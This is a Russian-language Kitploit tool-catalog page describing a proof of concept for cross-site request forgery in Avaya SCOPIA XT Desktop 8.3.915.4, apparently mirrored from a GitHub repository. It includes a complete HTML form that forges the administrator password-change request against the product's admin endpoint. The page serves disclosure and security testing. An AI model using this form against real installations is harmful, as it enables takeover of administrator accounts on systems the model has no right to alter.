Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4 — Доказательство концепции, демонстрирующее межсайтовую подделку запроса (CSRF) в Avaya SCOPIA XT Desktop, позволяющее сменить пароль администратора без anti-CSRF токена. | Kitploit
Инструменты/GitHubGitHub/v1n1v131r4/exploit-csrf-on-scopia-xt-desktop-version-8.3.915.4
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubv1n1v131r4/exploit-csrf-on-scopia-xt-desktop-version-8.3.915.4

Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4

Доказательство концепции, демонстрирующее межсайтовую подделку запроса (CSRF) в Avaya SCOPIA XT Desktop, позволяющее сменить пароль администратора без anti-CSRF токена.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
15 лет назадЕщё не проверено

Эксплуатация CSRF в SCOPIA XT Desktop версии 8.3.915.4

В данном PoC будет описано, как эксплуатировать межсайтовую подделку запроса (CSRF) в SCOPIA XT Desktop версии 8.3.915.4


О SCOPIA

сайт: https://support.avaya.com/products/P1421/scopia-desktop/8.2.1


О межсайтовой подделке запроса (CSRF)

Межсайтовая подделка запроса, также известная как атака в один клик или session riding и сокращённо обозначаемая как CSRF или XSRF, — это тип вредоносной атаки на веб-сайт, при которой от пользователя, которому доверяет веб-приложение, передаются несанкционированные команды.


Доказательство концепции — смена пароля администратора

1

На странице «Directory and Authentication» администратор может изменить свой пароль.

2

Перехватив запрос с помощью Burp Suite, я обнаружил, что анти-CSRF токен не реализован, а единственным механизмом безопасности является сессионный cookie.

6

Я создал этот HTML-файл, который послужил PoC для эксплуатации представленной уязвимости.

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
	<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
		<input type="text" name="JSESSIONID" value="">
		<input type="text" name="newadminusername" value="">
		<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
		<input type="text" name="newenablext1000meetingpin" value="false">
		<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
		<input type="text" name="checkstatus" value="true">
		<input type="submit" value="Send">
	</form>
</body>
</html>

При запуске в браузере с действительным cookie для среды администрирования SCOPIA XT Desktop удалось изменить пароль пользователя admin на «attacker»:

4

5

Скачать инструмент